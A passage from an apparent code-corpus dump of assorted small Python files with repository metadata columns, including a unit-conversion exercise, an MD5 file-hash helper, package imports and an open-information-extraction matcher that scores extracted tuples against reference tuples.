is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='door',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
)
]
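
`DUMP_PARTIAL` pairs each event with its server-side and client-side definitions. A consumer might flatten such a dump into a name-to-argument-names index; the sketch below uses tiny stand-ins for `EventData`/`CompoundEventData` (the real classes live in `to_python.core.types`) so it runs standalone:

```python
from types import SimpleNamespace as NS

# Minimal mock of one CompoundEventData entry, shaped like the dump above:
# each event has .name and .arguments.arguments (a list of argument groups).
arg = NS(name='towedBy')
event = NS(name='onClientTrailerAttach',
           arguments=NS(arguments=[[arg]], variable_length=False))
dump = [NS(server=[], client=[event])]

def index_events(dump):
    # Map event name -> list of first-overload argument names,
    # covering both the server and client sides of every entry.
    return {e.name: [grp[0].name for grp in e.arguments.arguments]
            for entry in dump for e in entry.server + entry.client}

print(index_events(dump))  # {'onClientTrailerAttach': ['towedBy']}
```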
ce94c0ff175d2ca8e40fab028ebdbeb133b6f2f2 | 301 | py | Python | curso em video - Phython/desafios/desafio 8.py | ThyagoHiggins/LP-Phython | 78e84aa77e786cc33b7d91397d17e93c3d5a692a | ["MIT"]
m = float(input('Informe o valor em metros: '))
print(f'O valor em Km é: {m/1000}')
print(f'O valor em Hm é: {m/100}')
print(f'O valor em dam é: {m/10}')
print(f'O valor em M é: {m}')
print(f'O valor em dm é: {m*10:.0f}')
print(f'O valor em cm é: {m*100:.0f}')
print(f'O valor em mm é: {m*1000:.0f}')
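
The seven hand-written prints of the exercise above can be expressed once as a factor table. This is a hypothetical refactor (the table and function names are my own, not part of the original exercise):

```python
# Factors that convert a value in meters to each target unit.
FACTORS = {'Km': 0.001, 'Hm': 0.01, 'dam': 0.1,
           'M': 1, 'dm': 10, 'cm': 100, 'mm': 1000}

def convert(meters):
    # Return the value expressed in every unit of the table.
    return {unit: meters * factor for unit, factor in FACTORS.items()}

print(convert(2.0)['cm'])  # 200.0
```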
ceb86bfb9a4787c6efe8af84a83b56fe902faba3 | 100 | py | Python | taggo/metadata/40_md5.py | xeor/taggo | 130d5229cd8c95628cfbe25297cd14338b31aa59 | ["MIT"]
import hashlib
def run(filepath):
return hashlib.md5(open(filepath, 'rb').read()).hexdigest()
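
The metadata hook above reads the whole file into memory in one call. For large files, a chunked variant keeps memory flat while producing the same digest; this is a sketch, not the original implementation:

```python
import hashlib

def run_chunked(filepath, chunk_size=1 << 20):
    # Stream the file in 1 MiB chunks instead of loading it whole;
    # yields the same hex digest as hashlib.md5(data).hexdigest().
    md5 = hashlib.md5()
    with open(filepath, 'rb') as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b''):
            md5.update(chunk)
    return md5.hexdigest()
```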
cece2e23c24dbe06c4a801d80200295ed98bbab9 | 161 | py | Python | surfactant_example/data/gromacs_files/path.py | force-h2020/force-bdss-plugin-surfactant-example | ba442f2b39919f7d071f4384f8eaba0d99f44b1f | ["BSD-2-Clause", "MIT"]
from os.path import join, dirname, abspath
def get_file(filename):
return join(dirpath(), filename)
def dirpath():
return dirname(abspath(__file__))
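
`get_file` resolves a data filename relative to the module's own directory rather than the process working directory. A standalone equivalent, with the module path passed explicitly (the `martini.itp` filename is a hypothetical Gromacs input, not from the repo):

```python
from os.path import join, dirname, abspath

def get_file(filename, module_file):
    # Same idea as the helper above: anchor data-file lookups to the
    # directory containing the given module, independent of the cwd.
    return join(dirname(abspath(module_file)), filename)

print(get_file('martini.itp', '/opt/pkg/gromacs_files/path.py'))
```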
cecfd72ea34cc07e1376e2d0f8c365436868a07c | 29 | py | Python | inner.py | iorobertob/test-inner | 717ee425d330e40f93bc2544eb76d0a864ba948a | ["MIT"]
print('inner labas modified')
ced273cfb651965a266dc11798e9a3b3fabccd18 | 298 | py | Python | ocs_sample_library_preview/Community/__init__.py | osisoft/sample-ocs-sample_libraries-python | 03e7b76f051643cb09eaa61342c9200034bb5266 | [
"Apache-2.0"
] | 4 | 2021-04-13T12:24:50.000Z | 2022-01-14T14:03:11.000Z | ocs_sample_library_preview/Community/__init__.py | osisoft/sample-ocs-sample_libraries-python | 03e7b76f051643cb09eaa61342c9200034bb5266 | [
"Apache-2.0"
] | 17 | 2021-03-09T22:04:13.000Z | 2022-03-24T17:08:29.000Z | ocs_sample_library_preview/Community/__init__.py | osisoft/sample-ocs-sample_libraries-python | 03e7b76f051643cb09eaa61342c9200034bb5266 | [
"Apache-2.0"
] | 2 | 2021-05-10T22:39:24.000Z | 2022-02-03T05:36:51.000Z | from .Community import Community
from .CommunityInput import CommunityInput
from .CommunitySummaryInformation import CommunitySummaryInformation
from .CommunityTenant import CommunityTenant
from .CommunityTenantStatus import CommunityTenantStatus
from .StreamSearchResult import StreamSearchResult
| 42.571429 | 68 | 0.899329 | 24 | 298 | 11.166667 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080537 | 298 | 6 | 69 | 49.666667 | 0.978102 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ced6ddd77a8c03acde68196af88253396e529792 | 48 | py | Python | component/tiles/__init__.py | ingdanielguerrero/SMFM_biota | 01582d4291d43488d108a9789db2f2dbe75e43ce | [
"MIT"
] | null | null | null | component/tiles/__init__.py | ingdanielguerrero/SMFM_biota | 01582d4291d43488d108a9789db2f2dbe75e43ce | [
"MIT"
] | 11 | 2021-06-07T17:22:42.000Z | 2021-12-06T18:43:03.000Z | component/tiles/__init__.py | ingdanielguerrero/SMFM_biota | 01582d4291d43488d108a9789db2f2dbe75e43ce | [
"MIT"
] | 3 | 2021-03-12T07:26:17.000Z | 2021-04-12T12:46:37.000Z | from .parameters import *
from .process import * | 24 | 25 | 0.770833 | 6 | 48 | 6.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 48 | 2 | 26 | 24 | 0.902439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0c6a6241367ae8af55704fec041deee4807a77d0 | 129 | py | Python | Standup.py | LuisAhumada/standup | df7a434d8a55f3015a05dbd4fc1ad06538dcb8c0 | [
"MIT"
] | null | null | null | Standup.py | LuisAhumada/standup | df7a434d8a55f3015a05dbd4fc1ad06538dcb8c0 | [
"MIT"
] | null | null | null | Standup.py | LuisAhumada/standup | df7a434d8a55f3015a05dbd4fc1ad06538dcb8c0 | [
"MIT"
] | null | null | null | version https://git-lfs.github.com/spec/v1
oid sha256:aedabb5ed858a6641115e1c397d6e85d066966166683d87fc43855329a19770a
size 2153
| 32.25 | 75 | 0.883721 | 13 | 129 | 8.769231 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.430894 | 0.046512 | 129 | 3 | 76 | 43 | 0.495935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0ca06da8ffccb4c6c39c2fe1248d2394b0ac2b22 | 186 | py | Python | start.py | Ahsanul08/song_recogniser | 4d6561d926b24967dcc5535bcc10c91dc4ebe0a6 | [
"MIT"
] | 2 | 2019-05-08T02:06:27.000Z | 2020-02-14T08:49:52.000Z | start.py | Ahsanul08/song_recogniser | 4d6561d926b24967dcc5535bcc10c91dc4ebe0a6 | [
"MIT"
] | 4 | 2021-06-08T19:03:29.000Z | 2022-01-13T00:43:20.000Z | start.py | Ahsanul08/song_recogniser | 4d6561d926b24967dcc5535bcc10c91dc4ebe0a6 | [
"MIT"
] | 1 | 2022-01-05T16:16:43.000Z | 2022-01-05T16:16:43.000Z | from config import djv, database_directory
def create_initial_database():
djv.fingerprint_directory(database_directory, [".mp3"])
print("Finished saving data to database :)")
| 23.25 | 59 | 0.758065 | 22 | 186 | 6.181818 | 0.727273 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00625 | 0.139785 | 186 | 7 | 60 | 26.571429 | 0.84375 | 0 | 0 | 0 | 0 | 0 | 0.210811 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
0ca5c8d5934256d4306654be0d21fa21b4c21e62 | 44 | py | Python | simfempy/applications/__init__.py | anairabeze/simfempy | 144362956263cb9b81f4bade15664d9cc640f93a | [
"MIT"
] | null | null | null | simfempy/applications/__init__.py | anairabeze/simfempy | 144362956263cb9b81f4bade15664d9cc640f93a | [
"MIT"
] | 3 | 2018-12-18T16:36:52.000Z | 2019-01-29T18:34:55.000Z | simfempy/applications/__init__.py | beckerrh/fempy | dd7214ea7f6d81a5200fcb4a91f07a5cd3322e9e | [
"MIT"
] | 1 | 2021-06-09T15:49:51.000Z | 2021-06-09T15:49:51.000Z | from . import application, heat, elasticity
| 22 | 43 | 0.795455 | 5 | 44 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 44 | 1 | 44 | 44 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0b8072327a0c0f35a50e64c2824a5483c2161bf0 | 113 | py | Python | lib_repo/SigProfPlot/sigProfilerPlotting/version.py | lgpdv/sigmut | cdee379bd31af69995b72427658fc0448bf56745 | [
"BSD-2-Clause"
] | null | null | null | lib_repo/SigProfPlot/sigProfilerPlotting/version.py | lgpdv/sigmut | cdee379bd31af69995b72427658fc0448bf56745 | [
"BSD-2-Clause"
] | null | null | null | lib_repo/SigProfPlot/sigProfilerPlotting/version.py | lgpdv/sigmut | cdee379bd31af69995b72427658fc0448bf56745 | [
"BSD-2-Clause"
] | 1 | 2020-06-14T17:49:59.000Z | 2020-06-14T17:49:59.000Z |
# THIS FILE IS GENERATED FROM SIGPROFILERPLOTTING SETUP.PY
short_version = '1.0.10'
version = '1.0.10'
| 18.833333 | 58 | 0.681416 | 17 | 113 | 4.470588 | 0.764706 | 0.210526 | 0.236842 | 0.289474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089888 | 0.212389 | 113 | 6 | 59 | 18.833333 | 0.764045 | 0.495575 | 0 | 0 | 1 | 0 | 0.218182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0bb3f0a42a93eaa1345e58f56c7a51cadcb41550 | 117 | py | Python | tests/conftest.py | briefmnews/django-uploads | c40d6d969ca66e83ec5716d97fdf3a9753e535bd | [
"MIT"
] | null | null | null | tests/conftest.py | briefmnews/django-uploads | c40d6d969ca66e83ec5716d97fdf3a9753e535bd | [
"MIT"
] | null | null | null | tests/conftest.py | briefmnews/django-uploads | c40d6d969ca66e83ec5716d97fdf3a9753e535bd | [
"MIT"
] | null | null | null | import pytest
from .factories import DocumentFactory
@pytest.fixture
def document():
return DocumentFactory()
| 13 | 38 | 0.777778 | 12 | 117 | 7.583333 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 117 | 8 | 39 | 14.625 | 0.919192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
e7f7c079aeab443c85120d8d4d38bde8944c1724 | 504 | py | Python | zeus/tasks/__init__.py | conrad-kronos/zeus | ddb6bc313e51fb22222b30822b82d76f37dbbd35 | [
"Apache-2.0"
] | null | null | null | zeus/tasks/__init__.py | conrad-kronos/zeus | ddb6bc313e51fb22222b30822b82d76f37dbbd35 | [
"Apache-2.0"
] | null | null | null | zeus/tasks/__init__.py | conrad-kronos/zeus | ddb6bc313e51fb22222b30822b82d76f37dbbd35 | [
"Apache-2.0"
] | null | null | null | from .aggregate_job_stats import * # NOQA
from .cleanup_artifacts import * # NOQA
from .cleanup_builds import * # NOQA
from .cleanup_pending_artifacts import * # NOQA
from .deactivate_repo import * # NOQA
from .delete_repo import * # NOQA
from .process_artifact import * # NOQA
from .process_pending_artifact import * # NOQA
from .process_travis_webhook import * # NOQA
from .resolve_ref import * # NOQA
from .send_build_notifications import * # NOQA
from .sync_github_access import * # NOQA
| 38.769231 | 48 | 0.761905 | 66 | 504 | 5.545455 | 0.378788 | 0.327869 | 0.420765 | 0.172131 | 0.15847 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 504 | 12 | 49 | 42 | 0.871429 | 0.117063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e7f93e98a16c45c626e20d3f1e1d9ddbc71e4571 | 140 | py | Python | tests/test_certstore.py | joneverett/certstore | 2f3d724cdc34fb88f0bc4d1d9348cb77ca9e6b34 | [
"Apache-2.0"
] | null | null | null | tests/test_certstore.py | joneverett/certstore | 2f3d724cdc34fb88f0bc4d1d9348cb77ca9e6b34 | [
"Apache-2.0"
] | null | null | null | tests/test_certstore.py | joneverett/certstore | 2f3d724cdc34fb88f0bc4d1d9348cb77ca9e6b34 | [
"Apache-2.0"
] | null | null | null | """pytests for certstore package."""
import os
import certstore
def test_bundle_exists():
assert os.path.isfile(certstore.ca_bundle)
| 15.555556 | 46 | 0.757143 | 19 | 140 | 5.421053 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135714 | 140 | 8 | 47 | 17.5 | 0.85124 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6520c8cf18a3d3686c63f985c0ec474d46a5bd30 | 11,862 | py | Python | relationextraction/carb/matcher.py | esborisova/Multi2OIE | 97fca3db385b7698079a508927719b6f4d540407 | [
"MIT"
] | 38 | 2020-09-17T13:57:41.000Z | 2022-03-15T01:17:01.000Z | relationextraction/carb/matcher.py | esborisova/Multi2OIE | 97fca3db385b7698079a508927719b6f4d540407 | [
"MIT"
] | 3 | 2021-03-25T06:00:54.000Z | 2021-09-07T12:57:27.000Z | relationextraction/carb/matcher.py | esborisova/Multi2OIE | 97fca3db385b7698079a508927719b6f4d540407 | [
"MIT"
] | 12 | 2020-11-03T04:39:17.000Z | 2022-02-24T16:57:06.000Z | from __future__ import division
import string
from nltk.translate.bleu_score import sentence_bleu
from nltk.corpus import stopwords
from copy import copy
import ipdb
class Matcher:
@staticmethod
def bowMatch(ref, ex, ignoreStopwords, ignoreCase):
"""
A binary function testing for exact lexical match (ignoring ordering) between reference
and predicted extraction
"""
s1 = ref.bow()
s2 = ex.bow()
if ignoreCase:
s1 = s1.lower()
s2 = s2.lower()
s1Words = s1.split(' ')
s2Words = s2.split(' ')
if ignoreStopwords:
s1Words = Matcher.removeStopwords(s1Words)
s2Words = Matcher.removeStopwords(s2Words)
return sorted(s1Words) == sorted(s2Words)
@staticmethod
def predMatch(ref, ex, ignoreStopwords, ignoreCase):
"""
        Return whether gold and predicted extractions agree on the predicate
"""
s1 = ref.elementToStr(ref.pred)
s2 = ex.elementToStr(ex.pred)
if ignoreCase:
s1 = s1.lower()
s2 = s2.lower()
s1Words = s1.split(' ')
s2Words = s2.split(' ')
if ignoreStopwords:
s1Words = Matcher.removeStopwords(s1Words)
s2Words = Matcher.removeStopwords(s2Words)
return s1Words == s2Words
@staticmethod
def argMatch(ref, ex, ignoreStopwords, ignoreCase):
"""
        Return whether gold and predicted extractions agree on the arguments
"""
sRef = ' '.join([ref.elementToStr(elem) for elem in ref.args])
sEx = ' '.join([ex.elementToStr(elem) for elem in ex.args])
count = 0
for w1 in sRef:
for w2 in sEx:
if w1 == w2:
count += 1
# We check how well does the extraction lexically cover the reference
# Note: this is somewhat lenient as it doesn't penalize the extraction for
# being too long
coverage = float(count) / len(sRef)
return coverage > Matcher.LEXICAL_THRESHOLD
@staticmethod
def bleuMatch(ref, ex, ignoreStopwords, ignoreCase):
sRef = ref.bow()
sEx = ex.bow()
bleu = sentence_bleu(references = [sRef.split(' ')], hypothesis = sEx.split(' '))
return bleu > Matcher.BLEU_THRESHOLD
@staticmethod
def lexicalMatch(ref, ex, ignoreStopwords, ignoreCase):
sRef = ref.bow().split(' ')
sEx = ex.bow().split(' ')
count = 0
#for w1 in sRef:
# if w1 in sEx:
# count += 1
# sEx.remove(w1)
for w1 in sRef:
for w2 in sEx:
if w1 == w2:
count += 1
# We check how well does the extraction lexically cover the reference
# Note: this is somewhat lenient as it doesn't penalize the extraction for
# being too long
coverage = float(count) / len(sRef)
return coverage > Matcher.LEXICAL_THRESHOLD
@staticmethod
def tuple_match(ref, ex, ignoreStopwords, ignoreCase):
precision = [0, 0] # 0 out of 0 predicted words match
recall = [0, 0] # 0 out of 0 reference words match
# If, for each part, any word is the same as a reference word, then it's a match.
predicted_words = ex.pred.split()
gold_words = ref.pred.split()
precision[1] += len(predicted_words)
recall[1] += len(gold_words)
# matching_words = sum(1 for w in predicted_words if w in gold_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
if matching_words == 0:
return False # t <-> gt is not a match
precision[0] += matching_words
recall[0] += matching_words
for i in range(len(ref.args)):
gold_words = ref.args[i].split()
recall[1] += len(gold_words)
if len(ex.args) <= i:
if i<2:
return False
else:
continue
predicted_words = ex.args[i].split()
precision[1] += len(predicted_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
if matching_words == 0 and i<2:
return False # t <-> gt is not a match
precision[0] += matching_words
# Currently this slightly penalises systems when the reference
# reformulates the sentence words, because the reformulation doesn't
# match the predicted word. It's a one-wrong-word penalty to precision,
# to all systems that correctly extracted the reformulated word.
recall[0] += matching_words
prec = 1.0 * precision[0] / precision[1]
rec = 1.0 * recall[0] / recall[1]
return [prec, rec]
# STRICTER LINIENT MATCH
def linient_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
precision = [0, 0] # 0 out of 0 predicted words match
recall = [0, 0] # 0 out of 0 reference words match
# If, for each part, any word is the same as a reference word, then it's a match.
predicted_words = ex.pred.split()
gold_words = ref.pred.split()
precision[1] += len(predicted_words)
recall[1] += len(gold_words)
# matching_words = sum(1 for w in predicted_words if w in gold_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
# matching 'be' with its different forms
forms_of_be = ["be","is","am","are","was","were","been","being"]
if "be" in predicted_words:
for form in forms_of_be:
if form in gold_words:
matching_words += 1
predicted_words.remove("be")
break
if matching_words == 0:
return [0,0] # t <-> gt is not a match
precision[0] += matching_words
recall[0] += matching_words
for i in range(len(ref.args)):
gold_words = ref.args[i].split()
recall[1] += len(gold_words)
if len(ex.args) <= i:
if i<2:
return [0,0] # changed
else:
continue
predicted_words = ex.args[i].split()
precision[1] += len(predicted_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
precision[0] += matching_words
# Currently this slightly penalises systems when the reference
# reformulates the sentence words, because the reformulation doesn't
# match the predicted word. It's a one-wrong-word penalty to precision,
# to all systems that correctly extracted the reformulated word.
recall[0] += matching_words
if(precision[1] == 0):
prec = 0
else:
prec = 1.0 * precision[0] / precision[1]
if(recall[1] == 0):
rec = 0
else:
rec = 1.0 * recall[0] / recall[1]
return [prec, rec]
@staticmethod
def simple_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
ref.args = [ref.args[0], ' '.join(ref.args[1:])]
ex.args = [ex.args[0], ' '.join(ex.args[1:])]
precision = [0, 0] # 0 out of 0 predicted words match
recall = [0, 0] # 0 out of 0 reference words match
# If, for each part, any word is the same as a reference word, then it's a match.
predicted_words = ex.pred.split()
gold_words = ref.pred.split()
precision[1] += len(predicted_words)
recall[1] += len(gold_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
precision[0] += matching_words
recall[0] += matching_words
for i in range(len(ref.args)):
gold_words = ref.args[i].split()
recall[1] += len(gold_words)
if len(ex.args) <= i:
break
predicted_words = ex.args[i].split()
precision[1] += len(predicted_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
precision[0] += matching_words
# Currently this slightly penalises systems when the reference
# reformulates the sentence words, because the reformulation doesn't
# match the predicted word. It's a one-wrong-word penalty to precision,
# to all systems that correctly extracted the reformulated word.
recall[0] += matching_words
prec = 1.0 * precision[0] / precision[1]
rec = 1.0 * recall[0] / recall[1]
return [prec, rec]
# @staticmethod
# def binary_linient_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
# if len(ref.args)>=2:
# # r = ref.copy()
# r = copy(ref)
# r.args = [ref.args[0], ' '.join(ref.args[1:])]
# else:
# r = ref
# if len(ex.args)>=2:
# # e = ex.copy()
# e = copy(ex)
# e.args = [ex.args[0], ' '.join(ex.args[1:])]
# else:
# e = ex
# return Matcher.linient_tuple_match(r, e, ignoreStopwords, ignoreCase)
@staticmethod
def binary_linient_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
if len(ref.args)>=2:
r = copy(ref)
r.args = [ref.args[0], ' '.join(ref.args[1:])]
else:
r = ref
if len(ex.args)>=2:
e = copy(ex)
e.args = [ex.args[0], ' '.join(ex.args[1:])]
else:
e = ex
stright_match = Matcher.linient_tuple_match(r, e, ignoreStopwords, ignoreCase)
said_type_reln = ["said", "told", "added", "adds", "says", "adds"]
said_type_sentence = False
for said_verb in said_type_reln:
if said_verb in ref.pred:
said_type_sentence = True
break
if not said_type_sentence:
return stright_match
else:
if len(ex.args)>=2:
e = copy(ex)
e.args = [' '.join(ex.args[1:]), ex.args[0]]
else:
e = ex
reverse_match = Matcher.linient_tuple_match(r, e, ignoreStopwords, ignoreCase)
return max(stright_match, reverse_match)
@staticmethod
def binary_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
if len(ref.args)>=2:
# r = ref.copy()
r = copy(ref)
r.args = [ref.args[0], ' '.join(ref.args[1:])]
else:
r = ref
if len(ex.args)>=2:
# e = ex.copy()
e = copy(ex)
e.args = [ex.args[0], ' '.join(ex.args[1:])]
else:
e = ex
return Matcher.tuple_match(r, e, ignoreStopwords, ignoreCase)
@staticmethod
def removeStopwords(ls):
return [w for w in ls if w.lower() not in Matcher.stopwords]
# CONSTANTS
BLEU_THRESHOLD = 0.4
LEXICAL_THRESHOLD = 0.5 # Note: changing this value didn't change the ordering of the tested systems
stopwords = stopwords.words('english') + list(string.punctuation)
| 34.785924 | 104 | 0.546872 | 1,442 | 11,862 | 4.407074 | 0.128988 | 0.068293 | 0.042486 | 0.051928 | 0.785681 | 0.773407 | 0.763493 | 0.739575 | 0.717231 | 0.699607 | 0 | 0.023483 | 0.353819 | 11,862 | 340 | 105 | 34.888235 | 0.80561 | 0.228966 | 0 | 0.74026 | 0 | 0 | 0.008659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.025974 | 0.004329 | 0.164502 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6542b8234f584576cc68a06ca1ee225cc7a56fef | 30 | py | Python | python/ql/test/query-tests/Metrics/imports/module2.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 4,036 | 2020-04-29T00:09:57.000Z | 2022-03-31T14:16:38.000Z | python/ql/test/query-tests/Metrics/imports/module2.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 2,970 | 2020-04-28T17:24:18.000Z | 2022-03-31T22:40:46.000Z | python/ql/test/query-tests/Metrics/imports/module2.py | ScriptBox99/github-codeql | 2ecf0d3264db8fb4904b2056964da469372a235c | [
"MIT"
] | 794 | 2020-04-29T00:28:25.000Z | 2022-03-30T08:21:46.000Z | import module3
import module4
| 10 | 14 | 0.866667 | 4 | 30 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.133333 | 30 | 2 | 15 | 15 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3306e863bd95f24accccae9685dd4d193bd16df5 | 125 | py | Python | pixutils/vplayer/__init__.py | dark1729dragon/pixutils | 41308a84f979e610edc757d3c2321f89f2a74bc2 | [
"BSD-2-Clause"
] | 1 | 2017-10-06T19:02:11.000Z | 2017-10-06T19:02:11.000Z | pixutils/vplayer/__init__.py | dark1729dragon/pixutils | 41308a84f979e610edc757d3c2321f89f2a74bc2 | [
"BSD-2-Clause"
] | null | null | null | pixutils/vplayer/__init__.py | dark1729dragon/pixutils | 41308a84f979e610edc757d3c2321f89f2a74bc2 | [
"BSD-2-Clause"
] | null | null | null | from __future__ import nested_scopes, generators, division, absolute_import, with_statement, print_function, unicode_literals | 125 | 125 | 0.88 | 15 | 125 | 6.733333 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072 | 125 | 1 | 125 | 125 | 0.87069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
3352837c7f041b21fcd93b6b60597dbee37ac4c6 | 32 | py | Python | UserFolder/__init__.py | legopitstop/User | b09ffaf9e9ee6dda85a7a3ca52d898b5c224117d | [
"MIT"
